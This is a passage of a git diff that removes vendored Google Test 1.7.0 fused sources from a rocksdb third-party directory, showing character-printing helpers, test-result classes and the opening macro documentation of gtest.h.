-    PrintByteSegmentInObjectTo(obj_bytes, 0, kChunkSize, os);
-    *os << " ... ";
-    // Rounds up to 2-byte boundary.
-    const size_t resume_pos = (count - kChunkSize + 1)/2*2;
-    PrintByteSegmentInObjectTo(obj_bytes, resume_pos, count - resume_pos, os);
-  }
-  *os << ">";
-}
-
-}  // namespace
-
-namespace internal2 {
-
-// Delegates to PrintBytesInObjectToImpl() to print the bytes in the
-// given object.  The delegation simplifies the implementation, which
-// uses the << operator and thus is easier done outside of the
-// ::testing::internal namespace, which contains a << operator that
-// sometimes conflicts with the one in STL.
-void PrintBytesInObjectTo(const unsigned char* obj_bytes, size_t count,
-                          ostream* os) {
-  PrintBytesInObjectToImpl(obj_bytes, count, os);
-}
-
-}  // namespace internal2
-
-namespace internal {
-
-// Depending on the value of a char (or wchar_t), we print it in one
-// of three formats:
-//   - as is if it's a printable ASCII (e.g. 'a', '2', ' '),
-//   - as a hexidecimal escape sequence (e.g. '\x7F'), or
-//   - as a special escape sequence (e.g. '\r', '\n').
-enum CharFormat {
-  kAsIs,
-  kHexEscape,
-  kSpecialEscape
-};
-
-// Returns true if c is a printable ASCII character.  We test the
-// value of c directly instead of calling isprint(), which is buggy on
-// Windows Mobile.
-inline bool IsPrintableAscii(wchar_t c) {
-  return 0x20 <= c && c <= 0x7E;
-}
-
-// Prints a wide or narrow char c as a character literal without the
-// quotes, escaping it when necessary; returns how c was formatted.
-// The template argument UnsignedChar is the unsigned version of Char,
-// which is the type of c.
-template <typename UnsignedChar, typename Char>
-static CharFormat PrintAsCharLiteralTo(Char c, ostream* os) {
-  switch (static_cast<wchar_t>(c)) {
-    case L'\0':
-      *os << "\\0";
-      break;
-    case L'\'':
-      *os << "\\'";
-      break;
-    case L'\\':
-      *os << "\\\\";
-      break;
-    case L'\a':
-      *os << "\\a";
-      break;
-    case L'\b':
-      *os << "\\b";
-      break;
-    case L'\f':
-      *os << "\\f";
-      break;
-    case L'\n':
-      *os << "\\n";
-      break;
-    case L'\r':
-      *os << "\\r";
-      break;
-    case L'\t':
-      *os << "\\t";
-      break;
-    case L'\v':
-      *os << "\\v";
-      break;
-    default:
-      if (IsPrintableAscii(c)) {
-        *os << static_cast<char>(c);
-        return kAsIs;
-      } else {
-        *os << "\\x" + String::FormatHexInt(static_cast<UnsignedChar>(c));
-        return kHexEscape;
-      }
-  }
-  return kSpecialEscape;
-}
-
-// Prints a wchar_t c as if it's part of a string literal, escaping it when
-// necessary; returns how c was formatted.
-static CharFormat PrintAsStringLiteralTo(wchar_t c, ostream* os) {
-  switch (c) {
-    case L'\'':
-      *os << "'";
-      return kAsIs;
-    case L'"':
-      *os << "\\\"";
-      return kSpecialEscape;
-    default:
-      return PrintAsCharLiteralTo<wchar_t>(c, os);
-  }
-}
-
-// Prints a char c as if it's part of a string literal, escaping it when
-// necessary; returns how c was formatted.
-static CharFormat PrintAsStringLiteralTo(char c, ostream* os) {
-  return PrintAsStringLiteralTo(
-      static_cast<wchar_t>(static_cast<unsigned char>(c)), os);
-}
-
-// Prints a wide or narrow character c and its code.  '\0' is printed
-// as "'\\0'", other unprintable characters are also properly escaped
-// using the standard C++ escape sequence.  The template argument
-// UnsignedChar is the unsigned version of Char, which is the type of c.
-template <typename UnsignedChar, typename Char>
-void PrintCharAndCodeTo(Char c, ostream* os) {
-  // First, print c as a literal in the most readable form we can find.
-  *os << ((sizeof(c) > 1) ? "L'" : "'");
-  const CharFormat format = PrintAsCharLiteralTo<UnsignedChar>(c, os);
-  *os << "'";
-
-  // To aid user debugging, we also print c's code in decimal, unless
-  // it's 0 (in which case c was printed as '\\0', making the code
-  // obvious).
-  if (c == 0)
-    return;
-  *os << " (" << static_cast<int>(c);
-
-  // For more convenience, we print c's code again in hexidecimal,
-  // unless c was already printed in the form '\x##' or the code is in
-  // [1, 9].
-  if (format == kHexEscape || (1 <= c && c <= 9)) {
-    // Do nothing.
-  } else {
-    *os << ", 0x" << String::FormatHexInt(static_cast<UnsignedChar>(c));
-  }
-  *os << ")";
-}
-
-void PrintTo(unsigned char c, ::std::ostream* os) {
-  PrintCharAndCodeTo<unsigned char>(c, os);
-}
-void PrintTo(signed char c, ::std::ostream* os) {
-  PrintCharAndCodeTo<unsigned char>(c, os);
-}
-
-// Prints a wchar_t as a symbol if it is printable or as its internal
-// code otherwise and also as its code.  L'\0' is printed as "L'\\0'".
-void PrintTo(wchar_t wc, ostream* os) {
-  PrintCharAndCodeTo<wchar_t>(wc, os);
-}
-
-// Prints the given array of characters to the ostream.  CharType must be either
-// char or wchar_t.
-// The array starts at begin, the length is len, it may include '\0' characters
-// and may not be NUL-terminated.
-template <typename CharType>
-GTEST_ATTRIBUTE_NO_SANITIZE_MEMORY_
-GTEST_ATTRIBUTE_NO_SANITIZE_ADDRESS_
-GTEST_ATTRIBUTE_NO_SANITIZE_THREAD_
-static void PrintCharsAsStringTo(
-    const CharType* begin, size_t len, ostream* os) {
-  const char* const kQuoteBegin = sizeof(CharType) == 1 ? "\"" : "L\"";
-  *os << kQuoteBegin;
-  bool is_previous_hex = false;
-  for (size_t index = 0; index < len; ++index) {
-    const CharType cur = begin[index];
-    if (is_previous_hex && IsXDigit(cur)) {
-      // Previous character is of '\x..' form and this character can be
-      // interpreted as another hexadecimal digit in its number. Break string to
-      // disambiguate.
-      *os << "\" " << kQuoteBegin;
-    }
-    is_previous_hex = PrintAsStringLiteralTo(cur, os) == kHexEscape;
-  }
-  *os << "\"";
-}
-
-// Prints a (const) char/wchar_t array of 'len' elements, starting at address
-// 'begin'.  CharType must be either char or wchar_t.
-template <typename CharType>
-GTEST_ATTRIBUTE_NO_SANITIZE_MEMORY_
-GTEST_ATTRIBUTE_NO_SANITIZE_ADDRESS_
-GTEST_ATTRIBUTE_NO_SANITIZE_THREAD_
-static void UniversalPrintCharArray(
-    const CharType* begin, size_t len, ostream* os) {
-  // The code
-  //   const char kFoo[] = "foo";
-  // generates an array of 4, not 3, elements, with the last one being '\0'.
-  //
-  // Therefore when printing a char array, we don't print the last element if
-  // it's '\0', such that the output matches the string literal as it's
-  // written in the source code.
-  if (len > 0 && begin[len - 1] == '\0') {
-    PrintCharsAsStringTo(begin, len - 1, os);
-    return;
-  }
-
-  // If, however, the last element in the array is not '\0', e.g.
-  //    const char kFoo[] = { 'f', 'o', 'o' };
-  // we must print the entire array.  We also print a message to indicate
-  // that the array is not NUL-terminated.
-  PrintCharsAsStringTo(begin, len, os);
-  *os << " (no terminating NUL)";
-}
-
-// Prints a (const) char array of 'len' elements, starting at address 'begin'.
-void UniversalPrintArray(const char* begin, size_t len, ostream* os) {
-  UniversalPrintCharArray(begin, len, os);
-}
-
-// Prints a (const) wchar_t array of 'len' elements, starting at address
-// 'begin'.
-void UniversalPrintArray(const wchar_t* begin, size_t len, ostream* os) {
-  UniversalPrintCharArray(begin, len, os);
-}
-
-// Prints the given C string to the ostream.
-void PrintTo(const char* s, ostream* os) {
-  if (s == NULL) {
-    *os << "NULL";
-  } else {
-    *os << ImplicitCast_<const void*>(s) << " pointing to ";
-    PrintCharsAsStringTo(s, strlen(s), os);
-  }
-}
-
-// MSVC compiler can be configured to define whar_t as a typedef
-// of unsigned short. Defining an overload for const wchar_t* in that case
-// would cause pointers to unsigned shorts be printed as wide strings,
-// possibly accessing more memory than intended and causing invalid
-// memory accesses. MSVC defines _NATIVE_WCHAR_T_DEFINED symbol when
-// wchar_t is implemented as a native type.
-#if !defined(_MSC_VER) || defined(_NATIVE_WCHAR_T_DEFINED)
-// Prints the given wide C string to the ostream.
-void PrintTo(const wchar_t* s, ostream* os) {
-  if (s == NULL) {
-    *os << "NULL";
-  } else {
-    *os << ImplicitCast_<const void*>(s) << " pointing to ";
-    PrintCharsAsStringTo(s, std::wcslen(s), os);
-  }
-}
-#endif  // wchar_t is native
-
-// Prints a ::string object.
-#if GTEST_HAS_GLOBAL_STRING
-void PrintStringTo(const ::string& s, ostream* os) {
-  PrintCharsAsStringTo(s.data(), s.size(), os);
-}
-#endif  // GTEST_HAS_GLOBAL_STRING
-
-void PrintStringTo(const ::std::string& s, ostream* os) {
-  PrintCharsAsStringTo(s.data(), s.size(), os);
-}
-
-// Prints a ::wstring object.
-#if GTEST_HAS_GLOBAL_WSTRING
-void PrintWideStringTo(const ::wstring& s, ostream* os) {
-  PrintCharsAsStringTo(s.data(), s.size(), os);
-}
-#endif  // GTEST_HAS_GLOBAL_WSTRING
-
-#if GTEST_HAS_STD_WSTRING
-void PrintWideStringTo(const ::std::wstring& s, ostream* os) {
-  PrintCharsAsStringTo(s.data(), s.size(), os);
-}
-#endif  // GTEST_HAS_STD_WSTRING
-
-}  // namespace internal
-
-}  // namespace testing
-// Copyright 2008, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: mheule@google.com (Markus Heule)
-//
-// The Google C++ Testing Framework (Google Test)
-
-
-// Indicates that this translation unit is part of Google Test's
-// implementation.  It must come before gtest-internal-inl.h is
-// included, or there will be a compiler error.  This trick exists to
-// prevent the accidental inclusion of gtest-internal-inl.h in the
-// user's code.
-#define GTEST_IMPLEMENTATION_ 1
-#undef GTEST_IMPLEMENTATION_
-
-namespace testing {
-
-using internal::GetUnitTestImpl;
-
-// Gets the summary of the failure message by omitting the stack trace
-// in it.
-std::string TestPartResult::ExtractSummary(const char* message) {
-  const char* const stack_trace = strstr(message, internal::kStackTraceMarker);
-  return stack_trace == NULL ? message :
-      std::string(message, stack_trace);
-}
-
-// Prints a TestPartResult object.
-std::ostream& operator<<(std::ostream& os, const TestPartResult& result) {
-  return os
-      << result.file_name() << ":" << result.line_number() << ": "
-      << (result.type() == TestPartResult::kSuccess ? "Success" :
-          result.type() == TestPartResult::kFatalFailure ? "Fatal failure" :
-          "Non-fatal failure") << ":\n"
-      << result.message() << std::endl;
-}
-
-// Appends a TestPartResult to the array.
-void TestPartResultArray::Append(const TestPartResult& result) {
-  array_.push_back(result);
-}
-
-// Returns the TestPartResult at the given index (0-based).
-const TestPartResult& TestPartResultArray::GetTestPartResult(int index) const {
-  if (index < 0 || index >= size()) {
-    printf("\nInvalid index (%d) into TestPartResultArray.\n", index);
-    internal::posix::Abort();
-  }
-
-  return array_[index];
-}
-
-// Returns the number of TestPartResult objects in the array.
-int TestPartResultArray::size() const {
-  return static_cast<int>(array_.size());
-}
-
-namespace internal {
-
-HasNewFatalFailureHelper::HasNewFatalFailureHelper()
-    : has_new_fatal_failure_(false),
-      original_reporter_(GetUnitTestImpl()->
-                         GetTestPartResultReporterForCurrentThread()) {
-  GetUnitTestImpl()->SetTestPartResultReporterForCurrentThread(this);
-}
-
-HasNewFatalFailureHelper::~HasNewFatalFailureHelper() {
-  GetUnitTestImpl()->SetTestPartResultReporterForCurrentThread(
-      original_reporter_);
-}
-
-void HasNewFatalFailureHelper::ReportTestPartResult(
-    const TestPartResult& result) {
-  if (result.fatally_failed())
-    has_new_fatal_failure_ = true;
-  original_reporter_->ReportTestPartResult(result);
-}
-
-}  // namespace internal
-
-}  // namespace testing
-// Copyright 2008 Google Inc.
-// All Rights Reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: wan@google.com (Zhanyong Wan)
-
-
-namespace testing {
-namespace internal {
-
-#if GTEST_HAS_TYPED_TEST_P
-
-// Skips to the first non-space char in str. Returns an empty string if str
-// contains only whitespace characters.
-static const char* SkipSpaces(const char* str) {
-  while (IsSpace(*str))
-    str++;
-  return str;
-}
-
-static std::vector<std::string> SplitIntoTestNames(const char* src) {
-  std::vector<std::string> name_vec;
-  src = SkipSpaces(src);
-  for (; src != NULL; src = SkipComma(src)) {
-    name_vec.push_back(StripTrailingSpaces(GetPrefixUntilComma(src)));
-  }
-  return name_vec;
-}
-
-// Verifies that registered_tests match the test names in
-// defined_test_names_; returns registered_tests if successful, or
-// aborts the program otherwise.
-const char* TypedTestCasePState::VerifyRegisteredTestNames(
-    const char* file, int line, const char* registered_tests) {
-  typedef ::std::set<const char*>::const_iterator DefinedTestIter;
-  registered_ = true;
-
-  std::vector<std::string> name_vec = SplitIntoTestNames(registered_tests);
-
-  Message errors;
-
-  std::set<std::string> tests;
-  for (std::vector<std::string>::const_iterator name_it = name_vec.begin();
-       name_it != name_vec.end(); ++name_it) {
-    const std::string& name = *name_it;
-    if (tests.count(name) != 0) {
-      errors << "Test " << name << " is listed more than once.\n";
-      continue;
-    }
-
-    bool found = false;
-    for (DefinedTestIter it = defined_test_names_.begin();
-         it != defined_test_names_.end();
-         ++it) {
-      if (name == *it) {
-        found = true;
-        break;
-      }
-    }
-
-    if (found) {
-      tests.insert(name);
-    } else {
-      errors << "No test named " << name
-             << " can be found in this test case.\n";
-    }
-  }
-
-  for (DefinedTestIter it = defined_test_names_.begin();
-       it != defined_test_names_.end();
-       ++it) {
-    if (tests.count(*it) == 0) {
-      errors << "You forgot to list test " << *it << ".\n";
-    }
-  }
-
-  const std::string& errors_str = errors.GetString();
-  if (errors_str != "") {
-    fprintf(stderr, "%s %s", FormatFileLocation(file, line).c_str(),
-            errors_str.c_str());
-    fflush(stderr);
-    posix::Abort();
-  }
-
-  return registered_tests;
-}
-
-#endif  // GTEST_HAS_TYPED_TEST_P
-
-}  // namespace internal
-}  // namespace testing
-
-#endif  // __clang_analyzer__
diff --git a/thirdparty/rocksdb/third-party/gtest-1.7.0/fused-src/gtest/gtest.h b/thirdparty/rocksdb/third-party/gtest-1.7.0/fused-src/gtest/gtest.h
deleted file mode 100644
index e3f0cfb..0000000
--- a/thirdparty/rocksdb/third-party/gtest-1.7.0/fused-src/gtest/gtest.h
+++ /dev/null
@@ -1,20725 +0,0 @@
-// Copyright 2005, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: wan@google.com (Zhanyong Wan)
-//
-// The Google C++ Testing Framework (Google Test)
-//
-// This header file defines the public API for Google Test.  It should be
-// included by any test program that uses Google Test.
-//
-// IMPORTANT NOTE: Due to limitation of the C++ language, we have to
-// leave some internal implementation details in this header file.
-// They are clearly marked by comments like this:
-//
-//   // INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-//
-// Such code is NOT meant to be used by a user directly, and is subject
-// to CHANGE WITHOUT NOTICE.  Therefore DO NOT DEPEND ON IT in a user
-// program!
-//
-// Acknowledgment: Google Test borrowed the idea of automatic test
-// registration from Barthelemy Dagenais' (barthelemy@prologique.com)
-// easyUnit framework.
-
-#ifndef GTEST_INCLUDE_GTEST_GTEST_H_
-#define GTEST_INCLUDE_GTEST_GTEST_H_
-
-#include <limits>
-#include <ostream>
-#include <vector>
-
-// Copyright 2005, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Authors: wan@google.com (Zhanyong Wan), eefacm@gmail.com (Sean Mcafee)
-//
-// The Google C++ Testing Framework (Google Test)
-//
-// This header file declares functions and macros used internally by
-// Google Test.  They are subject to change without notice.
-
-#ifndef GTEST_INCLUDE_GTEST_INTERNAL_GTEST_INTERNAL_H_
-#define GTEST_INCLUDE_GTEST_INTERNAL_GTEST_INTERNAL_H_
-
-// Copyright 2005, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Authors: wan@google.com (Zhanyong Wan)
-//
-// Low-level types and utilities for porting Google Test to various
-// platforms.  All macros ending with _ and symbols defined in an
-// internal namespace are subject to change without notice.  Code
-// outside Google Test MUST NOT USE THEM DIRECTLY.  Macros that don't
-// end with _ are part of Google Test's public API and can be used by
-// code outside Google Test.
-//
-// This file is fundamental to Google Test.  All other Google Test source
-// files are expected to #include this.  Therefore, it cannot #include
-// any other Google Test header.
-
-#ifndef GTEST_INCLUDE_GTEST_INTERNAL_GTEST_PORT_H_
-#define GTEST_INCLUDE_GTEST_INTERNAL_GTEST_PORT_H_
-
-// Environment-describing macros
-// -----------------------------
-//
-// Google Test can be used in many different environments.  Macros in
-// this section tell Google Test what kind of environment it is being
-// used in, such that Google Test can provide environment-specific
-// features and implementations.
-//
-// Google Test tries to automatically detect the properties of its
-// environment, so users usually don't need to worry about these
-// macros.  However, the automatic detection is not perfect.
-// Sometimes it's necessary for a user to define some of the following
-// macros in the build script to override Google Test's decisions.
-//
-// If the user doesn't define a macro in the list, Google Test will
-// provide a default definition.  After this header is #included, all
-// macros in this list will be defined to either 1 or 0.
-//
-// Notes to maintainers:
-//   - Each macro here is a user-tweakable knob; do not grow the list
-//     lightly.
-//   - Use #if to key off these macros.  Don't use #ifdef or "#if
-//     defined(...)", which will not work as these macros are ALWAYS
-//     defined.
-//
-//   GTEST_HAS_CLONE          - Define it to 1/0 to indicate that clone(2)
-//                              is/isn't available.
-//   GTEST_HAS_EXCEPTIONS     - Define it to 1/0 to indicate that exceptions
-//                              are enabled.
-//   GTEST_HAS_GLOBAL_STRING  - Define it to 1/0 to indicate that ::string
-//                              is/isn't available (some systems define
-//                              ::string, which is different to std::string).
-//   GTEST_HAS_GLOBAL_WSTRING - Define it to 1/0 to indicate that ::string
-//                              is/isn't available (some systems define
-//                              ::wstring, which is different to std::wstring).
-//   GTEST_HAS_POSIX_RE       - Define it to 1/0 to indicate that POSIX regular
-//                              expressions are/aren't available.
-//   GTEST_HAS_PTHREAD        - Define it to 1/0 to indicate that <pthread.h>
-//                              is/isn't available.
-//   GTEST_HAS_RTTI           - Define it to 1/0 to indicate that RTTI is/isn't
-//                              enabled.
-//   GTEST_HAS_STD_WSTRING    - Define it to 1/0 to indicate that
-//                              std::wstring does/doesn't work (Google Test can
-//                              be used where std::wstring is unavailable).
-//   GTEST_HAS_TR1_TUPLE      - Define it to 1/0 to indicate tr1::tuple
-//                              is/isn't available.
-//   GTEST_HAS_SEH            - Define it to 1/0 to indicate whether the
-//                              compiler supports Microsoft's "Structured
-//                              Exception Handling".
-//   GTEST_HAS_STREAM_REDIRECTION
-//                            - Define it to 1/0 to indicate whether the
-//                              platform supports I/O stream redirection using
-//                              dup() and dup2().
-//   GTEST_USE_OWN_TR1_TUPLE  - Define it to 1/0 to indicate whether Google
-//                              Test's own tr1 tuple implementation should be
-//                              used.  Unused when the user sets
-//                              GTEST_HAS_TR1_TUPLE to 0.
-//   GTEST_LANG_CXX11         - Define it to 1/0 to indicate that Google Test
-//                              is building in C++11/C++98 mode.
-//   GTEST_LINKED_AS_SHARED_LIBRARY
-//                            - Define to 1 when compiling tests that use
-//                              Google Test as a shared library (known as
-//                              DLL on Windows).
-//   GTEST_CREATE_SHARED_LIBRARY
-//                            - Define to 1 when compiling Google Test itself
-//                              as a shared library.
-
-// Platform-indicating macros
-// --------------------------
-//
-// Macros indicating the platform on which Google Test is being used
-// (a macro is defined to 1 if compiled on the given platform;
-// otherwise UNDEFINED -- it's never defined to 0.).  Google Test
-// defines these macros automatically.  Code outside Google Test MUST
-// NOT define them.
-//
-//   GTEST_OS_AIX      - IBM AIX
-//   GTEST_OS_CYGWIN   - Cygwin
-//   GTEST_OS_FREEBSD  - FreeBSD
-//   GTEST_OS_HPUX     - HP-UX
-//   GTEST_OS_LINUX    - Linux
-//     GTEST_OS_LINUX_ANDROID - Google Android
-//   GTEST_OS_MAC      - Mac OS X
-//     GTEST_OS_IOS    - iOS
-//   GTEST_OS_NACL     - Google Native Client (NaCl)
-//   GTEST_OS_OPENBSD  - OpenBSD
-//   GTEST_OS_QNX      - QNX
-//   GTEST_OS_SOLARIS  - Sun Solaris
-//   GTEST_OS_SYMBIAN  - Symbian
-//   GTEST_OS_WINDOWS  - Windows (Desktop, MinGW, or Mobile)
-//     GTEST_OS_WINDOWS_DESKTOP  - Windows Desktop
-//     GTEST_OS_WINDOWS_MINGW    - MinGW
-//     GTEST_OS_WINDOWS_MOBILE   - Windows Mobile
-//     GTEST_OS_WINDOWS_PHONE    - Windows Phone
-//     GTEST_OS_WINDOWS_RT       - Windows Store App/WinRT
-//   GTEST_OS_ZOS      - z/OS
-//
-// Among the platforms, Cygwin, Linux, Max OS X, and Windows have the
-// most stable support.  Since core members of the Google Test project
-// don't have access to other platforms, support for them may be less
-// stable.  If you notice any problems on your platform, please notify
-// googletestframework@googlegroups.com (patches for fixing them are
-// even more welcome!).
-//
-// It is possible that none of the GTEST_OS_* macros are defined.
-
-// Feature-indicating macros
-// -------------------------
-//
-// Macros indicating which Google Test features are available (a macro
-// is defined to 1 if the corresponding feature is supported;
-// otherwise UNDEFINED -- it's never defined to 0.).  Google Test
-// defines these macros automatically.  Code outside Google Test MUST
-// NOT define them.
-//
-// These macros are public so that portable tests can be written.
-// Such tests typically surround code using a feature with an #if
-// which controls that code.  For example:
-//
-// #if GTEST_HAS_DEATH_TEST
-//   EXPECT_DEATH(DoSomethingDeadly());
-// #endif
-//
-//   GTEST_HAS_COMBINE      - the Combine() function (for value-parameterized
-//                            tests)
-//   GTEST_HAS_DEATH_TEST   - death tests
-//   GTEST_HAS_PARAM_TEST   - value-parameterized tests
-//   GTEST_HAS_TYPED_TEST   - typed tests
-//   GTEST_HAS_TYPED_TEST_P - type-parameterized tests
-//   GTEST_IS_THREADSAFE    - Google Test is thread-safe.
-//   GTEST_USES_POSIX_RE    - enhanced POSIX regex is used. Do not confuse with
-//                            GTEST_HAS_POSIX_RE (see above) which users can
-//                            define themselves.
-//   GTEST_USES_SIMPLE_RE   - our own simple regex is used;
-//                            the above two are mutually exclusive.
-//   GTEST_CAN_COMPARE_NULL - accepts untyped NULL in EXPECT_EQ().
-
-// Misc public macros
-// ------------------
-//
-//   GTEST_FLAG(flag_name)  - references the variable corresponding to
-//                            the given Google Test flag.
-
-// Internal utilities
-// ------------------
-//
-// The following macros and utilities are for Google Test's INTERNAL
-// use only.  Code outside Google Test MUST NOT USE THEM DIRECTLY.
-//
-// Macros for basic C++ coding:
-//   GTEST_AMBIGUOUS_ELSE_BLOCKER_ - for disabling a gcc warning.
-//   GTEST_ATTRIBUTE_UNUSED_  - declares that a class' instances or a
-//                              variable don't have to be used.
-//   GTEST_DISALLOW_ASSIGN_   - disables operator=.
-//   GTEST_DISALLOW_COPY_AND_ASSIGN_ - disables copy ctor and operator=.
-//   GTEST_MUST_USE_RESULT_   - declares that a function's result must be used.
-//   GTEST_INTENTIONAL_CONST_COND_PUSH_ - start code section where MSVC C4127 is
-//                                        suppressed (constant conditional).
